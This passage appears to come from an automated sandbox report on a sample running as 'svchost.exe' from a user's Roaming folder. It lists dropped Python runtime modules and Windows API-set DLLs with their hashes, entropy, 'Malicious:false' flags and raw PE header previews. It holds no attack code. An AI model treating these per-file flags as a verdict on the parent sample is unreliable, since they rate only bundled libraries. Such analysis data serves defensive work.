                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-.DUi.*.i.*.i.*.`...k.*..+.k.*../.b.*....c.*..).h.*...+.k.*.}.+.k.*..+.j.*.i.+...*...".h.*...*.h.*.....h.*...(.h.*.Richi.*.........PE..L...../`...........!.....>...>......H=.......P............................................@.........................`e..P....e..x....................|..........p....`..T...........................8a..@............P...............................text....<.......>.................. ..`.rdata... ...P..."...B..............@..@.data...P............d..............@....rsrc................h..............@..@.reloc..p............t..............@..B................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_lzma.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):159408
                          Entropy (8bit):6.960223316470766
                          Encrypted:false
                          SSDEEP:3072:wV3Rr96Jf12nMU7gc22JNO2cUDQoxXChHALHuki4zHfBg9mNoaCmERoTpIuD1qyO:+hkFPMrxyhHALHEOpgYObdRoT0R
                          MD5:45D91843D03A51354A43D8DCECDF22E1
                          SHA1:C982DCDCEE7B2D64AEAA478D8FFE0087B64E391D
                          SHA-256:DB9ABC004E8DA4511025E47A255727CB45111195C6AEB6D50B61A037D7408D0A
                          SHA-512:34A13E0445499F7B655C40D9431710FDCCF1BFDA1C7477F23481E7C42526284736714ED38949F91098131F80B635631E3A0BA73DD3734D4E0759EE7F32968364
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......YEy..$.Q.$.Q.$.Q.\.Q.$.Q.U.P.$.Q.U.P.$.Q.U.P.$.Q.U.P.$.Q.V.P.$.Q.O.P.$.Q.$.Q@$.Q.V.P'$.Q.V.P.$.Q.V.Q.$.Q.V.P.$.QRich.$.Q................PE..L..../`...........!................h........................................p......?.....@..........................4..L....4..x....P...............R.......`.. ...(0..T............................0..@............................................text............................... ..`.rdata.............................@..@.data...`....@.......4..............@....rsrc........P.......8..............@..@.reloc.. ....`.......D..............@..B................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_multiprocessing.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):26800
                          Entropy (8bit):6.4189500308991985
                          Encrypted:false
                          SSDEEP:384:p6hMLUifrlrCojAelk6WPw6DsuOZRIuABLipJXj0DG4y8V5OB8hU:7lr9WY298RIuAtin0DG4ymFhU
                          MD5:DBEC7953A3000BB513B26A26F6C1128D
                          SHA1:B4CBF27FAB8DF534BE31D021E4C49C42161D4CBF
                          SHA-256:307046C4F970F910968EDDC6CB9B65767FA3A70C05AA966DD6434021FEEEBDDC
                          SHA-512:2C4D84F5D27E2EB84C1867223C147AB7B5F3C0B72671A5FBCC5936B3449D683AEBD7D3D2F07B4F4203E5D6523F0BD3F8314773567D5FB6FD7262A3CEBC84D20F
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........\.t.=.'.=.'.=.'.Eu'.=.'.L.&.=.'.L.&.=.'.L.&.=.'.L.&.=.'6O.&.=.'.V.&.=.'.=.'.=.'6O.&.=.'6O.&.=.'6O.'.=.'6O.&.=.'Rich.=.'........................PE..L...../`...........!................}........0......................................>.....@.........................p:..`....:..x....`..(............L.......p.......5..T............................6..@............0..\............................text............................... ..`.rdata..`....0......."..............@..@.data...0....P.......6..............@....rsrc...(....`.......:..............@..@.reloc.......p.......F..............@..B........................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_overlapped.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):40112
                          Entropy (8bit):6.515613246434881
                          Encrypted:false
                          SSDEEP:768:iW1TpulXdyBdthIw5o8IYkITWb7PkNIuttgHDG4y5Eh8i:EXdyBdRTTWb7PkNIuttghydi
                          MD5:4E5C64134B6C40E187B7F8627A6D8A2D
                          SHA1:F5C6AFFAB5A1D14D8B586A1893E136D87DDAAD75
                          SHA-256:5EEF3EB8F87D332128569E4810F9283FF57417F1BB67D59D1AB2F471505DC1B1
                          SHA-512:7D6783D20AEC060BB1D5C72FADC8D52EF6812EE0776851C96FA2AD21B66C9FA853F5F43B8B775C8A741BD2B35938E2FCCAC16A829E37F7C425978C59BA62B60B
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.SP..=...=...=.......=...<...=...8...=...9...=...>...=...<...=...;...=...<...=...<.v.=...5...=...=...=.......=...?...=.Rich..=.................PE..L...../`...........!.....>...B.......<.......P......................................|.....@.........................0i..X....i.......................................d..T............................d..@............P...............................text...2<.......>.................. ..`.rdata...$...P...&...B..............@..@.data...,............h..............@....rsrc................l..............@..@.reloc...............x..............@..B........................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_queue.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):26288
                          Entropy (8bit):6.44734679501627
                          Encrypted:false
                          SSDEEP:768:XH9qUbFuF16rtrazup1IumUYllDG4yzFhj:3AUbFYktrazup1IumUYlvyH
                          MD5:963DD36AEC3EDB74C533B91C5A37498E
                          SHA1:5B553F18630F25C52A41BED0AC9C6262CCA662DA
                          SHA-256:D0E208BF308030C4BF879BA2A17FBEED48E10DD76C0DBDC9EB3D5F7A990302F6
                          SHA-512:513438B82C62BF26079BFD42CF6C562F7DF02A3190B246D9FB32B4342766C27EB77DEF8DE8D748B71C483CEC2B88DD9EDAE367ABFE8C157D135A259A8D859D48
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H..|&.|&.|&....|&...'.|&...#.|&...".|&...%.|&.<.'.|&..'.|&.|'..|&.<...|&.<.&.|&.<...|&.<.$.|&.Rich.|&.................PE..L...../`...........!.........,...............0.......................................:....@..........................<..L...,=..d....`...............J.......p..\...X8..T............................8..@............0...............................text............................... ..`.rdata..b....0......."..............@..@.data...t....P.......8..............@....rsrc........`.......:..............@..@.reloc..\....p.......F..............@..B................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_socket.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):69808
                          Entropy (8bit):6.611317372453449
                          Encrypted:false
                          SSDEEP:1536:+NU6t0wKLlEIOiKISMD9f8+LeJzJbHjW/Z1IuBwC8lYHy/:+NPt0wKLlfkMD9f8ueJdbHi/Z1IuBwpL
                          MD5:FB09559F0C1C4DC91DFBE361828B0E39
                          SHA1:E38A5B68F38E6FFF3C276CEA2B40620B33295879
                          SHA-256:5EC25AD36306076275E094FCE70E150C632B193C916847535DF3904545F879F0
                          SHA-512:6D9BAE50E82F0B57240EFA2E637DE01C16CF1AEAAF95DD9F4B3DDF391CE163D140C06549243EF8D370D76A866190A49A1C1D8E8C0177CE8A709C574A1220E86C
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........3...]...]...]......].D.\...].D.X...].D.Y...].D.^...].c.\...]...\...]...\.J.].c.U...].c.]...].c.....].c._...].Rich..].................PE..L...../`...........!.....r..........Kq....................................... ............@......................... ...P...p...................................L.......T...............................@............................................text....p.......r.................. ..`.rdata...].......^...v..............@..@.data...@...........................@....rsrc...............................@..@.reloc..L...........................@..B................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_ssl.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):143024
                          Entropy (8bit):6.46611957726107
                          Encrypted:false
                          SSDEEP:3072:Z8wJl2IslifCkaWuNPTTT/TpvdSRyOvm5GgDdhpIuM7GHux3P:Zpl2IsMDuTT/T/SRMGgDrqx
                          MD5:50F9B63B7632255FE69ABE0C2B4FAE04
                          SHA1:623BB9731CC5AA99EEB7C28DDF949495B0501717
                          SHA-256:0A7786AD8A9D4A24BD84B520BB7A8862DF949ABFCF10027172AAF0E3A18EDE7A
                          SHA-512:B35536AD316D7FABF7617451F9A4AC2088A473A97E8E023BB7AB55C50707ED9E7B3CAC2C72CE98A5F6D2CC56DF2A5D5A6B149110994006F76937BC22644D9273
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............n..n..n......n.V.o..n.V.k..n.V.j..n.V.m..n.q.o..n.M.o..n...o..n..o...n.q.f..n.q.n..n.q..n.q.l..n.Rich.n.........................PE..L...../`...........!.........N......h........................................P......V`....@.............................d...D................................ ...#..H...T...............................@............................................text...,........................... ..`.rdata..............................@..@.data....I.......H..................@....rsrc...............................@..@.reloc...#... ...$..................@..B................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_win32sysloader.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):11776
                          Entropy (8bit):5.256625843110757
                          Encrypted:false
                          SSDEEP:192:U48hFSvy3GI5DBb7qqAcUkOJk4fgF6O/G9RdfzaYy/o:sq8zb7DAcUkOJF3O/8I/
                          MD5:D9026D178C4220AA2C40CA592E31F5C6
                          SHA1:1EDD3463DA5AB5B442FCFBFB4E9A70940B7A5A76
                          SHA-256:D5E2378B9028810872ADE3AD7591B716466EAE621CA5B6FFFB4822949A9ABF9A
                          SHA-512:00251232772E5BAAF314DE7E8263229094D4057763620A3C929623E3C93CD30C8FA5243015434318CA9A4DFA8F2E82F9519AB6CF55F232D97296F0B5F93D376B
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._aS...=...=...=..x....=. ^<...=.hb<...=. ^>...=. ^8...=. ^9...=..f<...=...<.8.=.^8...=.^=...=.^?...=.Rich..=.........................PE..L....^._...........!.........................0....;.......................................@.........................@5..`....5..d....`..l....................p......`1..T............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@......."..............@....gfids.......P.......$..............@..@.rsrc...l....`.......&..............@..@.reloc.......p.......*..............@..B........................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-console-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.080160932980843
                          Encrypted:false
                          SSDEEP:192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
                          MD5:502263C56F931DF8440D7FD2FA7B7C00
                          SHA1:523A3D7C3F4491E67FC710575D8E23314DB2C1A2
                          SHA-256:94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
                          SHA-512:633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....."............!......................... ...............................0.......J....@.............................+............ ..................8=..............T............................................................................text...+........................... ..`.rsrc........ ......................@..@......".........;...T...T.........".........d.................".....................RSDSMB...5.G.8.'.d.....api-ms-win-core-console-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......+....edata... ..`....rsrc$01....` .......rsrc$02......................".....................(...`...............,...W...................G...o...............................D...s...............5...b...............................................api-ms-win-core-console-l1-1-0.dll.AllocConsole.kern
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-datetime-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.093995452106596
                          Encrypted:false
                          SSDEEP:192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
                          MD5:CB978304B79EF53962408C611DFB20F5
                          SHA1:ECA42F7754FB0017E86D50D507674981F80BC0B9
                          SHA-256:90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
                          SHA-512:369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...A..............!......................... ...............................0.......#....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....A...........<...T...T.......A...........d...............A.......................RSDS...W,X.l..o....4....api-ms-win-core-datetime-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02....................A.......P...............(...8...H...................t.......................api-ms-win-core-datetime-l1-1-0.dll.GetDateFormatA.kernel32.GetDateFormatA.GetDateFormatW.kernel32.GetDateFormatW.GetTimeFormatA.kernel32.GetTimeFormatA
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-debug-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.1028816880814265
                          Encrypted:false
                          SSDEEP:384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
                          MD5:88FF191FD8648099592ED28EE6C442A5
                          SHA1:6A4F818B53606A5602C609EC343974C2103BC9CC
                          SHA-256:C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
                          SHA-512:942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......GF....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@................9...T...T...................d.......................................RSDS.j..v..C...B..h....api-ms-win-core-debug-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................P...............(...8...H...|...............q.......................api-ms-win-core-debug-l1-1-0.dll.DebugBreak.kernel32.DebugBreak.IsDebuggerPresent.kernel32.IsDebuggerPresent.OutputDebugStringA.kernel32.OutputDebugStri
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-errorhandling-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.126358371711227
                          Encrypted:false
                          SSDEEP:192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
                          MD5:6D778E83F74A4C7FE4C077DC279F6867
                          SHA1:F5D9CF848F79A57F690DA9841C209B4837C2E6C3
                          SHA-256:A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
                          SHA-512:02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\x.............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....\x..........A...T...T.......\x..........d...............\x......................RSDS.1....U45.z.d.....api-ms-win-core-errorhandling-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............\x......n...............(...D...`...................4...f.......................'...J.....................api-ms-win-core-errorhandling-l1-1-0.dll.GetErrorMode.kernel32.GetErrorMode.GetLastError.kernel32.GetLastError.RaiseExcept
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-file-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):21816
                          Entropy (8bit):7.014255619395433
                          Encrypted:false
                          SSDEEP:384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
                          MD5:94AE25C7A5497CA0BE6882A00644CA64
                          SHA1:F7AC28BBC47E46485025A51EEB6C304B70CEE215
                          SHA-256:7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
                          SHA-512:83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!.........................0...............................@......./....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@...............8...T...T..................d......................................RSDS.0...B..8....G....api-ms-win-core-file-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................K...K.......D...p...6...`.......................?...l...............A...................6..._...................;...e............... ...I...n...............-...d...................*...g...............*...U...................M...
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-file-l1-2-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.112057846012794
                          Encrypted:false
                          SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                          MD5:E2F648AE40D234A3892E1455B4DBBE05
                          SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                          SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                          SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-file-l2-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.166618249693435
                          Encrypted:false
                          SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                          MD5:E479444BDD4AE4577FD32314A68F5D28
                          SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
                          SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                          SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..|........8...T...T.......4..|........d...............4..|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-handle-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.1117101479630005
                          Encrypted:false
                          SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                          MD5:6DB54065B33861967B491DD1C8FD8595
                          SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
                          SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                          SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-heap-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.174986589968396
                          Encrypted:false
                          SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                          MD5:2EA3901D7B50BF6071EC8732371B821C
                          SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                          SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                          SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-interlocked-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):17856
                          Entropy (8bit):7.076803035880586
                          Encrypted:false
                          SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                          MD5:D97A1CB141C6806F0101A5ED2673A63D
                          SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                          SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                          SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-libraryloader-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.131154779640255
                          Encrypted:false
                          SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                          MD5:D0873E21721D04E20B6FFB038ACCF2F1
                          SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                          SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                          SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u*l...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....u*l........A...T...T........u*l........d................u*l....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............u*l....................(...p...........R...}...............*...Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-localization-l1-2-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20792
                          Entropy (8bit):7.089032314841867
                          Encrypted:false
                          SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                          MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                          SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                          SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                          SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                          Malicious:false
                          Reputation:unknown
